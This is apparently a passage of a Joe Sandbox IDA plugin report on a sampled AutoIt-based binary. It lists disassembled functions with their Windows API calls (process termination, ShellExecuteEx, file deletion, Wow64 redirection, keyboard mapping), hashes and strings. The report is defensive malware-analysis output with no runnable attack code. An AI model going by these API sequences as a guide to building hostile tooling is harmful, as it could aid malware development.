Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: Path$LineMoveObjectSelect$BeginCreateStroke
String ID:
API String ID: 43455801-0
Opcode ID: 1a6fa9fb28381a22d7005ea5e028bb3ba185681c0249759a32624a83a1c798ba
Instruction ID: 7d9f5a9ed9f8ce568a6349ebf7ee4607c5d54a2b87b16964e5625fcb22ff2b19
Opcode Fuzzy Hash: 1a6fa9fb28381a22d7005ea5e028bb3ba185681c0249759a32624a83a1c798ba
Instruction Fuzzy Hash: 87110976000118FFEF129F94EC88EAA7F6CFB08390F058012FA599A1A1C7719D55DBA1

Function 008351FD Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 00835218
GetDeviceCaps.GDI32(00000000,00000058), ref: 00835229
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00835230
ReleaseDC.USER32(00000000,00000000), ref: 00835238
MulDiv.KERNEL32(000009EC,?,00000000), ref: 0083524F
MulDiv.KERNEL32(000009EC,00000001,?), ref: 00835261

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: CapsDevice$Release
String ID:
API String ID: 1035833867-0
Opcode ID: 4d206b98c540457ab60e913293f0eb017149f6dbb28a22d1be641cbc2de87343
Instruction ID: 7fd214e856f8454af5f7fbfd85c6d2499b12c863d52878f2e2e75ebf86681435
Opcode Fuzzy Hash: 4d206b98c540457ab60e913293f0eb017149f6dbb28a22d1be641cbc2de87343
Instruction Fuzzy Hash: 5A016775E01714BBEB105BA59C49E5EBF78FF44751F045065FA45E7281DAB09C00CFA1

Function 007D1BC3 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON

Download Yara Rule

APIs

MapVirtualKeyW.USER32(0000005B,00000000), ref: 007D1BF4
MapVirtualKeyW.USER32(00000010,00000000), ref: 007D1BFC
MapVirtualKeyW.USER32(000000A0,00000000), ref: 007D1C07
MapVirtualKeyW.USER32(000000A1,00000000), ref: 007D1C12
MapVirtualKeyW.USER32(00000011,00000000), ref: 007D1C1A
MapVirtualKeyW.USER32(00000012,00000000), ref: 007D1C22

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: Virtual
String ID:
API String ID: 4278518827-0
Opcode ID: f2f5434d90278a4c11252bb8d46cf4685e37e37e90edb7acfad42b2e8c1c8f7f
Instruction ID: 687ba47921f3d03b5538a56ecf57692ef54e8509ca7cffaf1fbbfa4d7c11a39e
Opcode Fuzzy Hash: f2f5434d90278a4c11252bb8d46cf4685e37e37e90edb7acfad42b2e8c1c8f7f
Instruction Fuzzy Hash: 090167B0902B5ABDE3008F6A8C85B52FFA8FF19354F00411BE15C4BA42C7F5A864CBE5

Function 0083EB20 Relevance: 9.0, APIs: 6, Instructions: 42windowtimethreadCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,00000000), ref: 0083EB30
SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 0083EB46
GetWindowThreadProcessId.USER32(?,?), ref: 0083EB55
OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0083EB64
TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0083EB6E
CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0083EB75

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
String ID:
API String ID: 839392675-0
Opcode ID: cc679814a6a0bf1107b1dd6f8cb7e5906394c7dd12174a6988bcbcb5f3a74824
Instruction ID: 7a565d3d1b98be744fb3caeef5aa1684c47839155607acf7d6caa976e4961c81
Opcode Fuzzy Hash: cc679814a6a0bf1107b1dd6f8cb7e5906394c7dd12174a6988bcbcb5f3a74824
Instruction Fuzzy Hash: F1F01772240158BBE6216B62DC0EEBB7A7CFFCAB11F011159F642E119196E05A0186B9

Function 00827439 Relevance: 9.0, APIs: 6, Instructions: 37windowCOMMON

Download Yara Rule

APIs

GetClientRect.USER32(?), ref: 00827452
SendMessageW.USER32(?,00001328,00000000,?), ref: 00827469
GetWindowDC.USER32(?), ref: 00827475
GetPixel.GDI32(00000000,?,?), ref: 00827484
ReleaseDC.USER32(?,00000000), ref: 00827496
GetSysColor.USER32(00000005), ref: 008274B0

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: ClientColorMessagePixelRectReleaseSendWindow
String ID:
API String ID: 272304278-0
Opcode ID: 2897eea65885b5f14b39f3a13f314bcc9b57e3da8ee26c2ea8d9c5bcffba9bea
Instruction ID: 4bf8432fa100c91517f8eaeb60373b00df933e4337fbf0e235d2afd98540852f
Opcode Fuzzy Hash: 2897eea65885b5f14b39f3a13f314bcc9b57e3da8ee26c2ea8d9c5bcffba9bea
Instruction Fuzzy Hash: 8A01AD31400215EFEB506FA4EC08BBA7BB5FF14311F126064FA56A21A0CB711E41EB54

Function 00831874 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 0083187F
UnloadUserProfile.USERENV(?,?), ref: 0083188B
CloseHandle.KERNEL32(?), ref: 00831894
CloseHandle.KERNEL32(?), ref: 0083189C
GetProcessHeap.KERNEL32(00000000,?), ref: 008318A5
HeapFree.KERNEL32(00000000), ref: 008318AC

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
String ID:
API String ID: 146765662-0
Opcode ID: 77fa3bc4b8aec97cba6e7526bab630de11023e402109ab50f0ba13f19ac2428a
Instruction ID: 45855c8a8b1cd25d42f9f75e000cfc1966f085fd8d47c355138f82c4cfbfbdfc
Opcode Fuzzy Hash: 77fa3bc4b8aec97cba6e7526bab630de11023e402109ab50f0ba13f19ac2428a
Instruction Fuzzy Hash: 87E0E536004101BBDB016FA6ED0CD1AFF39FF4AB22B129221F26581170CBB29420DF60

Function 0083C5D0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 191windowCOMMON

Download Yara Rule

APIs

Part of subcall function 007D7620: _wcslen.LIBCMT ref: 007D7625

GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0083C6EE
_wcslen.LIBCMT ref: 0083C735
SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0083C79C
SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 0083C7CA

Strings

0, xrefs: 0083C6AF

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: ItemMenu$Info_wcslen$Default
String ID: 0
API String ID: 1227352736-4108050209
Opcode ID: b430de7b9c043a5a198b8e108a3b4f3845b0e200b868fd726c6689e66b4e5153
Instruction ID: 9f95cf98174b014e67d1d3b28d807a691b3774ae55d9d38d2072a5a1c9f122d2
Opcode Fuzzy Hash: b430de7b9c043a5a198b8e108a3b4f3845b0e200b868fd726c6689e66b4e5153
Instruction Fuzzy Hash: 6951BF716143019BD7149F28C889B6BB7E8FFD9314F040A2DF995F32A1EBA4D904CB92

Function 0085AD64 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 176COMMON

Download Yara Rule

APIs

ShellExecuteExW.SHELL32(0000003C), ref: 0085AEA3

Part of subcall function 007D7620: _wcslen.LIBCMT ref: 007D7625

GetProcessId.KERNEL32(00000000), ref: 0085AF38
CloseHandle.KERNEL32(00000000), ref: 0085AF67

Strings

@, xrefs: 0085AE72
<, xrefs: 0085AE6B

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: CloseExecuteHandleProcessShell_wcslen
String ID: <$@
API String ID: 146682121-1426351568
Opcode ID: da0e2c01cc21aa1fa386674d10267819eff7c9bcc01b944da79b2d44761e914b
Instruction ID: 0bee7db29d7fd59d5ed00fc8b39cf4986e3bc60b10c3821ba258fd39ffcb93a1
Opcode Fuzzy Hash: da0e2c01cc21aa1fa386674d10267819eff7c9bcc01b944da79b2d44761e914b
Instruction Fuzzy Hash: 41718C75A00219DFCB18DF54D489A9EBBF0FF08304F04859AE816AB352DB74ED45CB91

Function 0083719E Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120comlibraryloaderCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00837206
SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 0083723C
GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 0083724D
SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 008372CF

Strings

DllGetClassObject, xrefs: 00837242

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: ErrorMode$AddressCreateInstanceProc
String ID: DllGetClassObject
API String ID: 753597075-1075368562
Opcode ID: 89306fea5b1e11ba8d9072c512c990c6cfc4c51692de9449804bc763fe51f1f9
Instruction ID: 640867ce8fd61e76147eb52f6ae53e3a644028ecf0cbd4234357a4472f743381
Opcode Fuzzy Hash: 89306fea5b1e11ba8d9072c512c990c6cfc4c51692de9449804bc763fe51f1f9
Instruction Fuzzy Hash: 66412DB1604205EFDB25CF94C884A9B7BA9FF85314F1580A9BD06DF20AD7B5D944CBE0

Function 00831DE2 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 93windowCOMMON

Download Yara Rule

APIs

Part of subcall function 007D9CB3: _wcslen.LIBCMT ref: 007D9CBD

Part of subcall function 00833CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00833CCA

SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00831E66
SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00831E79
SendMessageW.USER32(?,00000189,?,00000000), ref: 00831EA9

Part of subcall function 007D6B57: _wcslen.LIBCMT ref: 007D6B6A

Strings

ComboBox, xrefs: 00831DF0
ListBox, xrefs: 00831E25

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: MessageSend$_wcslen$ClassName
String ID: ComboBox$ListBox
API String ID: 2081771294-1403004172
Opcode ID: 51de5db4710525733c6176a1fb0a7f0c873b2e588900fdb4368a1cc072f655f3
Instruction ID: 2ac97ce0731a2bd16e092f3e67138206709c84e69b9ce9e377e1a338b39c8238
Opcode Fuzzy Hash: 51de5db4710525733c6176a1fb0a7f0c873b2e588900fdb4368a1cc072f655f3
Instruction Fuzzy Hash: B9212371A00104AEDF14AB64DC49CFFB7B8FF85764F14411AF825E32E0DB794D0A8660

Function 00862F17 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78windowlibraryCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00862F8D
LoadLibraryW.KERNEL32(?), ref: 00862F94
SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00862FA9
DestroyWindow.USER32(?), ref: 00862FB1

Strings

SysAnimate32, xrefs: 00862F68

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: MessageSend$DestroyLibraryLoadWindow
String ID: SysAnimate32
API String ID: 3529120543-1011021900
Opcode ID: ecb8d5bc115c4f85dd7b72fad87bdd3a94f3aa44f380cc1f71c1db61b2b5b447
Instruction ID: 28910fe9f4c37563576dfc74d62e9840f1fdb8f6cf2f9de95c536a001d56d85b
Opcode Fuzzy Hash: ecb8d5bc115c4f85dd7b72fad87bdd3a94f3aa44f380cc1f71c1db61b2b5b447
Instruction Fuzzy Hash: 8121DC71200609ABEF205FA4DC80FBB37B9FF59368F124268FA50D61A0CBB1DC519760

Function 007F4D6D Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,007F4D1E,008028E9,?,007F4CBE,008028E9,008988B8,0000000C,007F4E15,008028E9,00000002), ref: 007F4D8D
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 007F4DA0
FreeLibrary.KERNEL32(00000000,?,?,?,007F4D1E,008028E9,?,007F4CBE,008028E9,008988B8,0000000C,007F4E15,008028E9,00000002,00000000), ref: 007F4DC3

Strings

mscoree.dll, xrefs: 007F4D86
CorExitProcess, xrefs: 007F4D98

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 9b4f72a97975287ac950f5891c2cf956afa6e2d54d21bb8cfff60523bd7b6257
Instruction ID: 722cd4dc54e1bdfecc5725ae667188a03582b0d680417e4766dcbe4ad7bced1d
Opcode Fuzzy Hash: 9b4f72a97975287ac950f5891c2cf956afa6e2d54d21bb8cfff60523bd7b6257
Instruction Fuzzy Hash: 2AF04F34A4020CFBDB159F94DC49BBEBBB5FF44752F0540A5FA09A2360DB759940CB90

Function 0082D3A0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32 ref: 0082D3AD
GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0082D3BF
FreeLibrary.KERNEL32(00000000), ref: 0082D3E5

Strings

X64, xrefs: 0082D2A8
GetSystemWow64DirectoryW, xrefs: 0082D3B9

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: GetSystemWow64DirectoryW$X64
API String ID: 145871493-2590602151
Opcode ID: 56acc7635ec59a8e162ee66810f510506ebedb2c72ae03935ba7bb40182e2d97
Instruction ID: ee55df78d4b2c9c4a4cd8b794dae97da1a7f13b66ca70176b47b07baf1497b6c
Opcode Fuzzy Hash: 56acc7635ec59a8e162ee66810f510506ebedb2c72ae03935ba7bb40182e2d97
Instruction Fuzzy Hash: 78F05C31406770DBDB7267109C0C97A3F10FF12701F6A8056F842E6201E764CCC486C1

Function 007D4E90 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,?,007D4EDD,?,008A1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 007D4E9C
GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 007D4EAE
FreeLibrary.KERNEL32(00000000,?,?,007D4EDD,?,008A1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 007D4EC0

Strings

Wow64DisableWow64FsRedirection, xrefs: 007D4EA8
kernel32.dll, xrefs: 007D4E94

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: Wow64DisableWow64FsRedirection$kernel32.dll
API String ID: 145871493-3689287502
Opcode ID: 5ae4dd9c37ccc0a770bab64cd97c8e4560bad834c27b165545f25ce5cba3b315
Instruction ID: 9de458723e45d0029d1a1cb5d66f2cb942ee730e5f33f2b0475bffe02b9a5a06
Opcode Fuzzy Hash: 5ae4dd9c37ccc0a770bab64cd97c8e4560bad834c27b165545f25ce5cba3b315
Instruction Fuzzy Hash: 58E0E635A015226B92711B25AC19A7B7664BF86B6270A0116FD45D2351DBB8CD0145A1

Function 007D4E59 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 22libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,?,00813CDE,?,008A1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 007D4E62
GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 007D4E74
FreeLibrary.KERNEL32(00000000,?,?,00813CDE,?,008A1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 007D4E87

Strings

Wow64RevertWow64FsRedirection, xrefs: 007D4E6E
kernel32.dll, xrefs: 007D4E5B

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: Wow64RevertWow64FsRedirection$kernel32.dll
API String ID: 145871493-1355242751
Opcode ID: f24b0283ae896b0715653a2d9263679abb4e88d818bf0dcff4638537704c6980
Instruction ID: 218106695dc267e442a51e82e977eea59d0e543f15694cee98d9b87d3399f11f
Opcode Fuzzy Hash: f24b0283ae896b0715653a2d9263679abb4e88d818bf0dcff4638537704c6980
Instruction Fuzzy Hash: 1DD012355026A1675A222B25FC18DAB7B28FFC6B613070616F945E2314CFB8CD0185D0

Function 00842947 Relevance: 7.8, APIs: 5, Instructions: 313fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00842C05
DeleteFileW.KERNEL32(?), ref: 00842C87
CopyFileW.KERNEL32(?,?,00000000,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00842C9D
DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00842CAE
DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00842CC0

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: File$Delete$Copy
String ID:
API String ID: 3226157194-0
Opcode ID: 52f7af0681d707c6ebf1af0749a280919180d34a138c47051d974cdc75854a8e
Instruction ID: 6b68b08c36382d805d57ab32d268f3660f3197392dfff93e2b1ec02d5eaf581e
Opcode Fuzzy Hash: 52f7af0681d707c6ebf1af0749a280919180d34a138c47051d974cdc75854a8e
Instruction Fuzzy Hash: 66B15D7190411DABDF21EBA4CC89EEEBB7DFF48354F5040A6F609E6241EA349A448F61

Function 0085A387 Relevance: 7.8, APIs: 5, Instructions: 256COMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32 ref: 0085A427
OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0085A435
GetProcessIoCounters.KERNEL32(00000000,?), ref: 0085A468
CloseHandle.KERNEL32(?), ref: 0085A63D

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

